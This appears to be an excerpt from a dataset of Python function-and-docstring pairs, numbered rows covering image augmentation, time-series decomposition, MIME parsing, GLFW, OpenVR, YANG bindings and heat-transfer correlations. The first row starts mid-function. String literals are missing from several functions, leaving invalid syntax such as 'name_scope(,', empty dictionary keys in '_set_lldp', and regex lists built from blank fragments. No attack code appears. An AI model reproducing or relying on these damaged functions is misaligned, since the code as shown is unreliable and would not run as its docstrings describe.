transform_matrix = transform_matrix_offset_center(zoom_matrix, h, w)
im_new = affine_transform(im, transform_matrix, channel_index, fill_mode, cval, order)
def _get_coord(coord):
if is_center:
coord = obj_box_coord_centroid_to_upleft(coord)
x = (coord[0] - im.shape[1] / 2) / zy + im.shape[1] / 2
y = (coord[1] - im.shape[0] / 2) / zx + im.shape[0] / 2
w = coord[2] / zy
h = coord[3] / zx
if x < 0:
if x + w <= 0:
return None
w = w + x
x = 0
elif x > im_new.shape[1]:
return None
if y < 0:
if y + h <= 0:
return None
h = h + y
y = 0
elif y > im_new.shape[0]:
return None
if (x is not None) and (x + w > im_new.shape[1]):
w = im_new.shape[1] - x
if (y is not None) and (y + h > im_new.shape[0]):
h = im_new.shape[0] - y
if (w / (h + 1.) > thresh_wh2) or (h / (w + 1.) > thresh_wh2):
return None
if (w / (im_new.shape[1] * 1.) < thresh_wh) or (h / (im_new.shape[0] * 1.) <
thresh_wh):
return None
coord = [x, y, w, h]
if is_center:
coord = obj_box_coord_upleft_to_centroid(coord)
return coord
coords_new = list()
classes_new = list()
for i, _ in enumerate(coords):
coord = coords[i]
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
if is_rescale:
coord = obj_box_coord_scale_to_pixelunit(coord, im.shape)
coord = _get_coord(coord)
if coord is not None:
coord = obj_box_coord_rescale(coord, im_new.shape)
coords_new.append(coord)
classes_new.append(classes[i])
else:
coord = _get_coord(coord)
if coord is not None:
coords_new.append(coord)
classes_new.append(classes[i])
return im_new, classes_new, coords_new | Zoom in and out of a single image, randomly or non-randomly, and compute the new bounding box coordinates.
Objects outside the cropped image will be removed.
Parameters
-----------
im : numpy.array
An image with dimension of [row, col, channel] (default).
classes : list of int or None
Class IDs.
coords : list of list of 4 int/float or None
Coordinates [[x, y, w, h], [x, y, w, h], ...].
zoom_range, row_index, col_index, channel_index, is_random, fill_mode, cval and order : see ``tl.prepro.zoom``.
is_rescale : boolean
Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
is_center : boolean
Set to True, if the x and y of coordinates are the centroid. (i.e. darknet format). Default is False.
thresh_wh : float
Threshold; remove the box if its ratio of width (or height) to image size is less than the threshold.
thresh_wh2 : float
Threshold; remove the box if its ratio of width to height (or vice versa) is higher than the threshold.
Returns
-------
numpy.array
A processed image
list of int
A list of classes
list of list of 4 numbers
A list of new bounding boxes. |
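A hedged usage sketch (assumes TensorLayer's prepro helpers are importable alongside the function above; the image and the single box are made up):
```python
import numpy as np

# 100x100 RGB image with one class-0 box at (x=30, y=40, w=20, h=10),
# zoomed deterministically by 10% on both axes.
im = np.zeros((100, 100, 3), dtype=np.float32)
im2, classes2, coords2 = obj_box_zoom(
    im,
    classes=[0],
    coords=[[30, 40, 20, 10]],
    zoom_range=(1.1, 1.1),
    is_random=False,
)
print(im2.shape, classes2, coords2)
```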
11,175 | def concentric_circles_path(size):
width, height = size
x0, y0 = width // 2, height // 2
max_radius = int(sqrt(2) * max(height, width))
yield from fill_concentric_circles(radius=max_radius, center=(x0, y0), size=size) | Yields a set of paths that are concentric circles, moving outwards, about the center of the image.
:param size: The (width, height) of the image
:return: Yields individual circles, where each circle is a generator that yields pixel coordinates. |
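A small usage sketch, assuming the function and its fill_concentric_circles helper are importable from the same module:
```python
circles = concentric_circles_path((10, 10))   # (width, height)
first = next(circles)                          # innermost circle around the centre
print(list(first)[:5])                         # a few pixel coordinates on that circle
```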
11,176 | def getOverlayInputMethod(self, ulOverlayHandle):
fn = self.function_table.getOverlayInputMethod
peInputMethod = VROverlayInputMethod()
result = fn(ulOverlayHandle, byref(peInputMethod))
return result, peInputMethod | Returns the current input settings for the specified overlay. |
11,177 | def str(self, var, default=NOTSET, multiline=False):
value = self.get_value(var, default=default)
if multiline:
return value.replace('\\n', '\n')
return value | :rtype: str |
11,178 | def decompose_by_component(model, observed_time_series, parameter_samples):
with tf.compat.v1.name_scope(,
values=[observed_time_series]):
[
observed_time_series,
is_missing
] = sts_util.canonicalize_observed_time_series_with_mask(
observed_time_series)
num_timesteps = dist_util.prefer_static_value(
tf.shape(input=observed_time_series))[-2]
ssm = model.make_state_space_model(num_timesteps=num_timesteps,
param_vals=parameter_samples)
posterior_means, posterior_covs = ssm.posterior_marginals(
observed_time_series, mask=is_missing)
return _decompose_from_posterior_marginals(
model, posterior_means, posterior_covs, parameter_samples) | Decompose an observed time series into contributions from each component.
This method decomposes a time series according to the posterior representation
of a structural time series model. In particular, it:
- Computes the posterior marginal mean and covariances over the additive
model's latent space.
- Decomposes the latent posterior into the marginal blocks for each
model component.
- Maps the per-component latent posteriors back through each component's
observation model, to generate the time series modeled by that component.
Args:
model: An instance of `tfp.sts.Sum` representing a structural time series
model.
observed_time_series: `float` `Tensor` of shape
`batch_shape + [num_timesteps, 1]` (omitting the trailing unit dimension
is also supported when `num_timesteps > 1`), specifying an observed time
series. May optionally be an instance of `tfp.sts.MaskedTimeSeries`, which
includes a mask `Tensor` to specify timesteps with missing observations.
parameter_samples: Python `list` of `Tensors` representing posterior
samples of model parameters, with shapes `[concat([
[num_posterior_draws], param.prior.batch_shape,
param.prior.event_shape]) for param in model.parameters]`. This may
optionally also be a map (Python `dict`) of parameter names to
`Tensor` values.
Returns:
component_dists: A `collections.OrderedDict` instance mapping
component StructuralTimeSeries instances (elements of `model.components`)
to `tfd.Distribution` instances representing the posterior marginal
distributions on the process modeled by each component. Each distribution
has batch shape matching that of `posterior_means`/`posterior_covs`, and
event shape of `[num_timesteps]`.
#### Examples
Suppose we've built a model and fit it to data:
```python
day_of_week = tfp.sts.Seasonal(
num_seasons=7,
observed_time_series=observed_time_series,
name='day_of_week')
local_linear_trend = tfp.sts.LocalLinearTrend(
observed_time_series=observed_time_series,
name='local_linear_trend')
model = tfp.sts.Sum(components=[day_of_week, local_linear_trend],
observed_time_series=observed_time_series)
num_steps_forecast = 50
samples, kernel_results = tfp.sts.fit_with_hmc(model, observed_time_series)
```
To extract the contributions of individual components, pass the time series
and sampled parameters into `decompose_by_component`:
```python
component_dists = decompose_by_component(
model,
observed_time_series=observed_time_series,
parameter_samples=samples)
# Component mean and stddev have shape `[len(observed_time_series)]`.
day_of_week_effect_mean = component_dists[day_of_week].mean()
day_of_week_effect_stddev = component_dists[day_of_week].stddev()
```
Using the component distributions, we can visualize the uncertainty for
each component:
```
from matplotlib import pylab as plt
num_components = len(component_dists)
xs = np.arange(len(observed_time_series))
fig = plt.figure(figsize=(12, 3 * num_components))
for i, (component, component_dist) in enumerate(component_dists.items()):
# If in graph mode, replace `.numpy()` with `.eval()` or `sess.run()`.
component_mean = component_dist.mean().numpy()
component_stddev = component_dist.stddev().numpy()
ax = fig.add_subplot(num_components, 1, 1 + i)
ax.plot(xs, component_mean, lw=2)
ax.fill_between(xs,
component_mean - 2 * component_stddev,
component_mean + 2 * component_stddev,
alpha=0.5)
ax.set_title(component.name)
``` |
11,179 | def img2img_transformer2d_n31():
hparams = img2img_transformer2d_base()
hparams.batch_size = 1
hparams.num_encoder_layers = 6
hparams.num_decoder_layers = 12
hparams.num_heads = 8
hparams.query_shape = (16, 32)
hparams.memory_flange = (16, 32)
return hparams | Set of hyperparameters. |
11,180 | def parse_media_range(range):
(type, subtype, params) = parse_mime_type(range)
if 'q' not in params or not params['q'] or \
float(params['q']) > 1 or float(params['q']) < 0:
params['q'] = '1'
return (type, subtype, params) | Carves up a media range and returns a tuple of the
(type, subtype, params) where 'params' is a dictionary
of all the parameters for the media range.
For example, the media range 'application/*;q=0.5' would
get parsed into:
('application', '*', {'q': '0.5'})
In addition this function also guarantees that there
is a value for 'q' in the params dictionary, filling it
in with a proper default if necessary. |
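A usage sketch, assuming the module's parse_mime_type helper is available; the default 'q' value shown is the conventional '1' used above.
```python
print(parse_media_range("application/*;q=0.5"))
# ('application', '*', {'q': '0.5'})

print(parse_media_range("text/html"))
# 'q' is filled in when absent:
# ('text', 'html', {'q': '1'})
```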
11,181 | def add_node(self, info):
if not info.initialized:
return
graph = self._request_graph(info.ui.control)
if graph is None:
return
IDs = [v.ID for v in graph.nodes]
node = Node(ID=make_unique_name("node", IDs))
graph.nodes.append(node)
retval = node.edit_traits(parent=info.ui.control, kind="livemodal")
if not retval.result:
graph.nodes.remove(node) | Handles adding a Node to the graph. |
11,182 | def check(self, completed, failed=None):
if len(self) == 0:
return True
against = set()
if self.success:
against = completed
if failed is not None and self.failure:
against = against.union(failed)
if self.all:
return self.issubset(against)
else:
return not self.isdisjoint(against) | check whether our dependencies have been met. |
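A self-contained sketch of the set logic above, using a stand-in class with the same `success`, `failure` and `all` flags (names taken from the method body); this is not the real dependency class.
```python
class Dep(set):
    """Stand-in: a set of msg ids plus the three flags used by check()."""
    def __init__(self, ids, success=True, failure=False, all=True):
        super().__init__(ids)
        self.success, self.failure, self.all = success, failure, all

    def check(self, completed, failed=None):
        if len(self) == 0:
            return True
        against = set()
        if self.success:
            against = completed
        if failed is not None and self.failure:
            against = against.union(failed)
        if self.all:
            return self.issubset(against)
        return not self.isdisjoint(against)

d = Dep({"a", "b"})                              # all dependencies must succeed
print(d.check(completed={"a"}, failed={"b"}))    # False: 'b' failed
print(d.check(completed={"a", "b"}))             # True
```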
11,183 | def init():
cwd = _getcwd()
res = _glfw.glfwInit()
os.chdir(cwd)
return res | Initializes the GLFW library.
Wrapper for:
int glfwInit(void); |
11,184 | def _get_struct_dropshadowfilter(self):
obj = _make_object("DropShadowFilter")
obj.DropShadowColor = self._get_struct_rgba()
obj.BlurX = unpack_fixed16(self._src)
obj.BlurY = unpack_fixed16(self._src)
obj.Angle = unpack_fixed16(self._src)
obj.Distance = unpack_fixed16(self._src)
obj.Strength = unpack_fixed8(self._src)
bc = BitConsumer(self._src)
obj.InnerShadow = bc.u_get(1)
obj.Knockout = bc.u_get(1)
obj.CompositeSource = bc.u_get(1)
obj.Passes = bc.u_get(5)
return obj | Get the values for the DROPSHADOWFILTER record. |
11,185 | def setattr(self, name, val):
nodes = self._do_query(multiple=False)
try:
return self.poco.agent.hierarchy.setAttr(nodes, name, val)
except UnableToSetAttributeException as e:
raise InvalidOperationException(.format(str(e), self)) | Change the attribute value of the UI element. Not all attributes can be cast to text. Changing an
immutable attribute, or an attribute that does not exist, raises InvalidOperationException.
Args:
name: attribute name
val: new attribute value to cast
Raises:
InvalidOperationException: when it fails to set the attribute on UI element |
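A usage sketch; `poco` is assumed to be an already-initialised Poco instance for the target app, and "score_label" is a made-up node name.
```python
node = poco("score_label")          # select a UI node by (hypothetical) name
node.setattr("text", "100")         # cast a new value onto its 'text' attribute
print(node.attr("text"))            # read it back with the getter counterpart
```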
11,186 | def _set_lldp(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=lldp.lldp, is_container=, presence=True, yang_name="lldp", rest_name="lldp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u: {u: u, u: u, u: u, u: None, u: None, u: None, u: u}}, namespace=, defining_module=, yang_type=, is_config=True)
except (TypeError, ValueError):
raise ValueError({
: ,
: "container",
: ,
})
self.__lldp = t
if hasattr(self, ):
self._set() | Setter method for lldp, mapped from YANG variable /protocol/lldp (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_lldp is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lldp() directly. |
11,187 | def list_overlay_names(self):
overlay_names = []
for fname in _ls(self._overlays_abspath):
name, ext = os.path.splitext(fname)
overlay_names.append(name)
return overlay_names | Return list of overlay names. |
11,188 | def read_client_secrets():
client_secrets = _default_client_secrets()
secrets = get_secrets_file()
if secrets is not None:
client_secrets = read_json(secrets)
else:
from sregistry.defaults import SREGISTRY_CLIENT_SECRETS
write_json(client_secrets, SREGISTRY_CLIENT_SECRETS)
return client_secrets | For private or protected registries, a client secrets file is required,
located at .sregistry. If no secrets are found, we fall back to the default
of Singularity Hub and return dummy secrets. |
11,189 | def infos(self, type=None, failed=False):
nodes = self.nodes(failed="all")
infos = []
for n in nodes:
infos.extend(n.infos(type=type, failed=failed))
return infos | Get all infos created by the participant's nodes.
Return a list of infos produced by nodes associated with the
participant. If specified, ``type`` filters by class. By default, failed
infos are excluded; to include only failed infos use ``failed=True``,
and for all infos use ``failed="all"``. Note that ``failed`` filters the infos,
not the nodes - infos from all nodes (whether failed or not) can be
returned. |
11,190 | def build_message(self, checker):
solution = % checker.solution if self.with_solutions else
return .format(checker.code,
checker.msg,
solution) | Builds the checker's error message to report |
11,191 | def filter_composite_from_subgroups(s):
dims = []
for letter, sg in zip('ABCDEFGHIJKLMNOPQRSTUVWXYZ', s[2:]):
dims.append('dim{0}'.format(letter))
if dims:
return ' '.join(dims) | Given a sorted list of subgroups, return a string appropriate to provide as
a composite track's `filterComposite` argument
>>> import trackhub
>>> trackhub.helpers.filter_composite_from_subgroups(['cell', 'ab', 'lab', 'knockdown'])
'dimA dimB'
Parameters
----------
s : list
A list representing the ordered subgroups, ideally the same list
provided to `dimensions_from_subgroups`. The values are not actually
used, just the number of items. |
11,192 | def status_counter(self):
counter = collections.Counter()
for task in self:
counter[str(task.status)] += 1
return counter | Returns a `Counter` object that counts the number of tasks with a
given status (the string representation of the status is used as the key). |
11,193 | def get_reference_line_numeration_marker_patterns(prefix=u):
title = u""
if type(prefix) in (str, unicode):
title = prefix
g_name = u
g_close = u
space = r
patterns = [
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
]
return [re.compile(p, re.I | re.UNICODE) for p in patterns] | Return a list of compiled regex patterns used to search for the marker
of a reference line in a full-text document.
:param prefix: (string) the possible prefix to a reference line
:return: (list) of compiled regex patterns. |
11,194 | def gather_dilated_memory_blocks(x,
num_memory_blocks,
gap_size,
query_block_size,
memory_block_size,
gather_indices,
direction="left"):
gathered_blocks = []
for block_id in range(num_memory_blocks):
block_end_index = -(query_block_size + gap_size *
(block_id + 1) + memory_block_size * block_id)
block_start_index = (
(memory_block_size + gap_size) * (num_memory_blocks - (block_id + 1)))
if direction != "left":
[block_end_index,
block_start_index] = [-block_start_index, -block_end_index]
if block_end_index == 0:
x_block = x[block_start_index:]
else:
x_block = x[block_start_index:block_end_index]
def gather_dilated_1d_blocks(x, gather_indices):
x_new = tf.gather(x, gather_indices)
return tf.transpose(x_new, [2, 3, 0, 1, 4])
gathered_blocks.append(gather_dilated_1d_blocks(x_block, gather_indices))
return tf.concat(gathered_blocks, 3) | Gathers blocks with gaps in between.
Args:
x: Tensor of shape [length, batch, heads, depth]
num_memory_blocks: how many memory blocks to look in "direction". Each will
be separated by gap_size.
gap_size: an integer indicating the gap size
query_block_size: an integer indicating size of query block
memory_block_size: an integer indicating the size of a memory block.
gather_indices: The indices to gather from.
direction: left or right
Returns:
Tensor of shape [batch, heads, blocks, block_length, depth] |
11,195 | def Nu_cylinder_Zukauskas(Re, Pr, Prw=None):
if Re <= 40:
c, m = 0.75, 0.4
elif Re < 1E3:
c, m = 0.51, 0.5
elif Re < 2E5:
c, m = 0.26, 0.6
else:
c, m = 0.076, 0.7
if Pr <= 10:
n = 0.37
else:
n = 0.36
Nu = c*Re**m*Pr**n
if Prw:
Nu = Nu*(Pr/Prw)**0.25
return Nu | r'''Calculates Nusselt number for crossflow across a single tube at a
specified Re. Method from [1]_, also shown without modification in [2]_.
.. math::
Nu_{D}=CRe^{m}Pr^{n}\left(\frac{Pr}{Pr_s}\right)^{1/4}
Parameters
----------
Re : float
Reynolds number with respect to cylinder diameter, [-]
Pr : float
Prandtl number at free stream temperature [-]
Prw : float, optional
Prandtl number at wall temperature, [-]
Returns
-------
Nu : float
Nusselt number with respect to cylinder diameter, [-]
Notes
-----
If Prandtl number at wall are not provided, the Prandtl number correction
is not used and left to an outside function.
n is 0.37 if Pr <= 10; otherwise n is 0.36.
C and m are from the following table. If Re is outside of the ranges shown,
the nearest range is used blindly.
+---------+-------+-----+
| Re | C | m |
+=========+=======+=====+
| 1-40 | 0.75 | 0.4 |
+---------+-------+-----+
| 40-1E3 | 0.51 | 0.5 |
+---------+-------+-----+
| 1E3-2E5 | 0.26 | 0.6 |
+---------+-------+-----+
| 2E5-1E6 | 0.076 | 0.7 |
+---------+-------+-----+
Examples
--------
Example 7.3 in [2]_, matches.
>>> Nu_cylinder_Zukauskas(7992, 0.707, 0.69)
50.523612661934386
References
----------
.. [1] Zukauskas, A. Heat transfer from tubes in crossflow. In T.F. Irvine,
Jr. and J. P. Hartnett, editors, Advances in Heat Transfer, volume 8,
pages 93-160. Academic Press, Inc., New York, 1972.
.. [2] Bergman, Theodore L., Adrienne S. Lavine, Frank P. Incropera, and
David P. DeWitt. Introduction to Heat Transfer. 6E. Hoboken, NJ:
Wiley, 2011. |
11,196 | def sources(self):
try:
return self._sources
except AttributeError:
self._sources = find_sources(self)
return self._sources | Returns a dictionary of source methods found on this object,
keyed on method name. Source methods are identified by
(self, context) arguments on this object. For example:
.. code-block:: python
def f(self, context):
...
is a source method, but
.. code-block:: python
def f(self, ctx):
...
is not. |
11,197 | def variations(iterable, optional=lambda x: False):
iterable = tuple(iterable)
o = [optional(x) for x in iterable]
a = set()
for p in product([False, True], repeat=sum(o)):
p = list(p)
v = [b and (b and p.pop(0)) for b in o]
v = tuple(iterable[i] for i in xrange(len(v)) if not v[i])
a.add(v)
return sorted(a, cmp=lambda x, y: len(y) - len(x)) | Returns all possible variations of a sequence with optional items. |
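The function above is Python 2 code from the Pattern library (xrange, cmp-based sort). A small Python 3 re-implementation of the same idea, shown here only to illustrate the behaviour:
```python
from itertools import product

def variations_py3(iterable, optional=lambda x: False):
    # Every optional item is independently kept or dropped; longer
    # variations are listed first, mirroring the sort above.
    items = tuple(iterable)
    opt = [optional(x) for x in items]
    results = set()
    for choice in product([False, True], repeat=sum(opt)):
        it = iter(choice)
        drop = [next(it) if is_opt else False for is_opt in opt]
        results.add(tuple(x for x, d in zip(items, drop) if not d))
    return sorted(results, key=len, reverse=True)

print(variations_py3(("the", "very", "big", "dog"),
                     optional=lambda w: w == "very"))
# [('the', 'very', 'big', 'dog'), ('the', 'big', 'dog')]
```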
11,198 | def update_Broyden_J(self):
CLOG.debug()
delta_vals = self.param_vals - self._last_vals
delta_residuals = self.calc_residuals() - self._last_residuals
nrm = np.sqrt(np.dot(delta_vals, delta_vals))
direction = delta_vals / nrm
vals = delta_residuals / nrm
self._rank_1_J_update(direction, vals)
self.JTJ = np.dot(self.J, self.J.T) | Execute a Broyden update of J |
11,199 | def start(self):
version = self.request("get", "/version")
if version != 2:
raise GanetiApiError("Can't work with RAPI version %d" % version)
try:
features = self.request("get", "/2/features")
except GanetiApiError as e:
# Okay, calm down, this is totally reasonable. Certain older
# Ganeti RAPIs don't have a list of features.
if getattr(e, "code", None) == 404:
features = []
else:
raise
logging.info("RAPI features: %r" % (features,))
self.features = features | Confirm that we may access the target cluster. |